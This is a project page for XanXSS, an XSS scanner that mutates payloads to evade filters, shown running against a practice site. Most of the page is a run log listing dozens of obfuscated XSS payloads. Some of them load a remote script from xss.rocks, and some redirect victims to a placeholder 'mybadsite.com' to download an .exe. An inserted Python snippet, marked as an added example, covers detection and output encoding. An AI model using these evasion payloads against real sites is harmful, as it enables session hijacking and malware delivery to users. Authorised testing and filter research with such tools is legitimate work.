XanXSS - A Simple XSS Finding Tool


XanXSS is a reflected XSS searching tool (DOM coming soon) that creates payloads based on templates. Unlike other XSS scanners that just run through a list of payloads, XanXSS tries to make the payload unidentifiable, for example:
<xAnXSS</TitLE></STYLE><SVG/ONload='alERt(1);'/></XaNxSs</titLe></StYlE><SvG/ONlOAD='alerT(1);'/>
<ifrAmE&#13;Src=&#160;[2].Find(CoNfirm);=&#160;"JAVaScRIpT:proMpT(1))"javAscrIpt:/*--></scRIPt>
/>cLIcK&#13;Me!</b</TextaRea></TiTLE><BUTtON ONcLIck='aleRT(1);'/>XaNxss</TEXTaRea>
<iMG&#13;sRc=%0acONfIRM();=+'jAVASCRiPT:alerT("XSS");'</STYlE><Svg/onLoad='alErT((1));'/>
With XanXSS every payload is different. XanXSS works by running through the payloads until a specified number is found or a timer hits the max time; this prevents it from looping for too long. Some of the features included in XanXSS:
  • Ability to pass your own headers using -H
  • Ability to generate a polyglot script using -P
  • Ability to run behind a proxy using --proxy
  • And many more

Proof of Concept
For this proof of concept we will use https://xss-game.appspot.com/level1/frame
admin@TBG-a0216: /bin/python/xanxss$ python xanxss.py -u "http://xss-game.appspot.com/level1/frame?query=" -a 12 -t 12 -f 25 -v

    ____  ___             ____  ___  _________ _________
    \   \/  /____    ____ \   \/  / /   _____//   _____/
     \     /\__  \  /    \ \     /  \_____  \ \_____  \
     /     \ / __ \|   |  \/     \  /        \/        \
    /___/\  (____  /___|  /___/\  \/_______  /_______  /
          \_/    \/     \/      \_/        \/        \/
 Twitter->   @stay__salty
 Github -->  ekultek
 Version---> v(0.1)

[info][16:37:34] using default payloads
[info][16:37:34] generating payloads
[info][16:37:34] running payloads through tampering procedures
[info][16:37:34] payloads tampered successfully
[info][16:37:34] running payloads
[debug][16:37:34] running payload '<xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>'
[debug][16:37:34] running payload '<SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>'
[debug][16:37:34] running payload '<xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>'
[debug][16:37:34] running payload '<iMG/+/sRc=%0dA=%0DPrOMpt,a(();=%0a'JaVaSCripT:aLeRt("XSS"));'javasCRiPT:/*--></sCRipt>'
[debug][16:37:34] running payload '<SCRIPT/*/srC=&#34;&#62;A=%0aprompT,A(();=%09'htTp://xSs.rockS/XSs.Js'</TeXTARea></TiTLE><buTTOn oncLiCK='ALeRT(1);'/>XAnXsS</tEXTARea></scrIPTjaVaSCRipT:/*--></sCRIPt>'
[debug][16:37:35] running payload '<IMg&#160;SRC=%09CONFIRM(());=%0a'JavAscrIpt:aLERt("XSS");'JavasCrIpT:/*--></SCripT>'
[debug][16:37:35] running payload '<XAnXSS</STYlE><SVg/OnLOAd='aLeRT(1));'/></xAnXsSjaVasCRIpt:/*--></scrIpt>'
[debug][16:37:35] running payload '<sCRIPt`Src=+cOnFiRm());=+'htTP://xSs.rOCKs/xsS.js'</TextaREA></tiTle><ButTon ONCliCK='AlErt(1);'/>xanxSS</TeXTarEa></SCriPtJAvaScrIPt:/*--></SCrIpt>'
[debug][16:37:35] running payload '<scRIpT</title></stYle><sVG/onlOAD='AlERT(1));'/>aLert((1));</scRipT</titLE></STyLe><sVG/oNlOad='aLeRt((1));'/>'
[debug][16:37:35] running payload '<SC\u009lripT/*/SrC=%0aConFirm();=&#160;'hTTP://xsS.ROcks/xSs.js'</TITle></StYlE><svg/ONLOad='ALerT(1);'/></ScriPT</StyLe><svG/OnLOAd='ALert((1);'/>'
[debug][16:37:35] running payload '<B//ONMOuSEOver=&#34;&#62;ConFIrm(();=&#160;wIndow.LoCATIoN=&#160\u005g;(pRoMPT))``;=%0A'htTpS://MyBaDSitE.cOM/dOwnLoAd.phP?iTem=+(pRomPt)``;=%0apuMPEDuPkICKs.exE'jaVAScrIpt:/*--></sCrIPt>ClIcK/*/mE!</b</tiTLe></sTyLE><sVG/OnLoAd='aLert(1));'/>'
[debug][16:37:35] running payload '<IfRA\u007pmeSrC=%0AcOnFIRm(());=%0a"jaVAScriPT:pRoMPT(1)"jAVaScRIpt:/*--></SCriPt>'
[debug][16:37:36] running payload '<IframE//SrC=&#34;&#62;CONfIRM());=%0d"jAvAscriPT:pROMpT(1)"</TeXtarEa></TiTLe><BUttoN oNcliCK='aLERt((1));'/>XanXss</texTAReA>'
[debug][16:37:36] running payload '<iMG/+/SRc=%09[3].FInd(COnFIRm));=&#34;&#62;'javAscriPt:A\u004pLerT("XSS");'JavaSCriPt:/*--></sCripT>'
[debug][16:37:36] running payload '<imG&#160;SRc=%0d[2].FinD(cOnFiRm));=&#160;'JaVaScRipt:ALERt("XSS"));'</styLe><SVg/oNLoad='ALErT(1));'/>'
[debug][16:37:36] running payload '<script</tITLE></style><SVG/onLOAD='alerT(1);'/>AleRt(1);</ScRIpTjAvASCrIPT:/*--></scRIPt>'
[debug][16:37:36] running payload '<XaNxSs</tITle></sTYlE><SVg/ONload='aLERT((1);'/></xANxsS</stYLE><Svg/OnlOAD='AleRt(1);'/>'
[debug][16:37:36] running payload '<b//ONmOUSEoVEr=%0D[8].fInd(coNfIrM);=%09WinDoW.location=%0A(COnfiRm)(();=&#160;'htTPS://MYBadsite.cOM/DoWNlOaD.php?ITEm=+COnFIrM();=+puMPEDupKickS.ExE'</styLe><sVG/OnLOAd='alERt((1);'/>CLickMe!</b</sTYlE><SVG/onloAD='AlERt(1);'/>'
[debug][16:37:37] running payload '<scriPT</styLE><SvG/ONloaD='aLERT(1);'/>ALeRt(1);</SCrIPt</tiTLe></STYlE><sVG/OnloAd='aLeRT(1\u009x);'/>'
[debug][16:37:37] running payload '<iFRamEsrC=&#34;&#62;[7].FInD(cOnFiRm);=%0A"javAsCRipT:prompt(1))"</tITlE\u009e></sTyle><svg/oNLOad='alert((1);'/>'
[debug][16:37:37] running payload '<b/*/OnmOusEOver=&#160;A=%0apROMpt,A();=+wINdOW.LOCAtIon=&#34;&#62;co\U006EfiR\u006\u003id();=%09'HTtPS://MYBAdsiTE.com/doWNload.php?itEm=+((CoNfIrm)();=&#34;&#62;puMpedUPKickS.eXe'</teXtaREa></tiTLe><BUTTON oNclIck='aLeRT((1);'/>XanXsS</texTAREA>cLICk/*/Me!</B</StylE><SVG/ONloAd='aLERt((1));'/>'
[debug][16:37:37] running payload '<XANxSSJaVaScRIpt:/*--></SCripT></XAnXSs</TExtAREa></tITle\u008w><b\u009fuTTON oNclIck='Ale\u003rRT((1);'/>xANXss</TEXTArEA>'
[debug][16:37:37] running payload '<SCript/*/sRC=+A=&#160;prOmpt,A();=&#160;'HtTp://XsS.rocKS/xsS.JS'</stylE><sVG/onLoad='AlErT((1);'/></SCriptjAvaScriPt:/*--></ScrIpt>'
[debug][16:37:37] running payload '<ImG&#13;SRc=&#34;&#62;Co\U006efIr\u006D();=%0a\u007u'javAsCript:AlerT(("XSS");'</titlE></StYLe><svg/onloAD='alERt(1);'/>'
[debug][16:37:38] running payload '<B/*/ONmouSeOvEr=%0Aa=&#160;prOmpT,A();=%09WIndOw.LOCAtION=%0Aa=%09prompt,a();=%0A'hTTps://MYBadsITe.COM/DOWNLOAD.PHp?ITeM=&#160;cO\u006Efir\u006D());=%0dPumPeduPkicks.EXE'</tITlE></StyLE><svg/OnlOAD='aLerT((1));'/>clIcK&#13;mE!</bJavASCript:/*--></sCrIPT>'
[warning][16:37:48] times up dumping found
[info][16:37:48] working payloads:
--------------------------------------------------
    > <xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>
    > <SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>
    > <xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>
--------------------------------------------------
[info][16:37:48] found a total of 3 working payloads
admin@TBG-a0216: /bin/python/xanxss$
Now let's check those scripts in the HTML of the website:
Payload: <xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>


Payload: <SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>


Payload: <xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>
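
What the per-request tampering means on the receiving side, as an added example that is not part of XanXSS or the original post: an exact-string blocklist misses these payloads, a check run after normalization flags them, and HTML-encoding the reflected value neutralizes them regardless of spelling. The signature list, the marker regex and all function names are assumptions made for illustration; two samples are copied from the proof-of-concept output above and the benign query is constructed.

```python
import html
import re
from urllib.parse import unquote

# Exact strings of the kind a fixed payload list or blocklist is built around.
STATIC_SIGNATURES = ["<script>alert(1)</script>", "<svg onload=alert(1)>"]

# Structural markers looked for after normalization (assumed, non-exhaustive).
MARKERS = re.compile(
    r"<\s*/?\s*(?:script|svg|iframe|img|button)\b|\bon[a-z]+\s*=|javascript\s*:"
)

# Two payloads copied from the proof-of-concept output, plus a constructed
# benign query for contrast.
SAMPLES = {
    "svg_onload": "<xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>",
    "img_src": r'''<IMg&#160;SRC=%09CONFIRM(());=%0a'JavAscrIpt:aLERt("XSS");'JavasCrIpT:/*--></SCripT>''',
    "benign": "how to cook rice",
}

def normalize(value: str) -> str:
    """Strip the tampering layers: URL encoding, HTML entities, odd whitespace, case."""
    previous = None
    while previous != value:  # decode until stable to catch nested encoding
        previous = value
        value = html.unescape(unquote(value))
    value = re.sub(r"[\x00-\x20\xa0]+", " ", value)
    return value.lower()

def static_match(value: str) -> bool:
    return any(sig in value for sig in STATIC_SIGNATURES)

def normalized_match(value: str) -> bool:
    return bool(MARKERS.search(normalize(value)))

def render_safely(value: str) -> str:
    """The actual fix: HTML-encode the reflected value at output time."""
    return html.escape(value, quote=True)

def evaluate() -> dict:
    return {
        name: (static_match(v), normalized_match(v), render_safely(v))
        for name, v in SAMPLES.items()
    }

if __name__ == "__main__":
    for name, (static, normalized, rendered) in evaluate().items():
        print(f"{name}: static={static} normalized={normalized} rendered={rendered}")
```

The marker regex is a detection aid for logs and can produce false positives on ordinary text containing patterns such as `onsale=`; the encoding step is what removes the vulnerability.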


Options
XanXSS comes complete with the ability to use a proxy, is compatible with proxychains, and allows you to add custom headers. I have provided a full list of options for your convenience:
usage: xanxss.py [-h] [-u http://test.com/test.php?id=] [-a VERIFY]
                 [-f AMOUNT] [-t TIME] [-p SCRIPT, [SCRIPT, ...]]
                 [-F FILE-PATH] [-v] [--proxy TYPE://IP:PORT]
                 [-H HEADER=VALUE,HEADER:VALUE] [--throttle TIME secs] [-P]

optional arguments:
  -h, --help            show this help message and exit
  -u http://test.com/test.php?id=, --url http://test.com/test.php?id=
                        pass a URL to test for XSS vulnerabilities. it is
                        recommended that you use a URL with a query parameter
  -a VERIFY, --amount VERIFY
                        how many verifications steps to be taken, this will
                        decide how reliable the payload is. the more
                        verification steps the more reliable the payload will
                        be (*default=5)
  -f AMOUNT, --find AMOUNT
                        attempt to find this amount of working payloads,
                        specifying this does not guarantee you will find this
                        amount of working payloads (*default=25)
  -t TIME, --time TIME  amount of time in seconds to spend on testing, this
                        will be used as a timer for the verification
                        (*default=35s)
  -p SCRIPT, [SCRIPT, ...], --payloads SCRIPT, [SCRIPT, ...]
                        pass a comma separated list of your own payloads, must
                        contain at least 5 payloads
  -F FILE-PATH, --file FILE-PATH
                        pass a textual file containing payloads one per line,
                        must contain at least 5 payloads
  -v, --verbose         run in verbose mode and display more output
                        (*default=False)
  --proxy TYPE://IP:PORT
                        pass a proxy in the format type://ip:port
  -H HEADER=VALUE,HEADER:VALUE, --headers HEADER=VALUE,HEADER:VALUE
                        add your own custom headers to the request
                        (*default=connection,user-agent)
  --throttle TIME (secs)
                        bound each request with a sleep time (*default=0)
  -P, --polyglot        generate a polyglot script to append to the end of the
                        running scripts, if there is XSS this should find it
                        (*default=False)



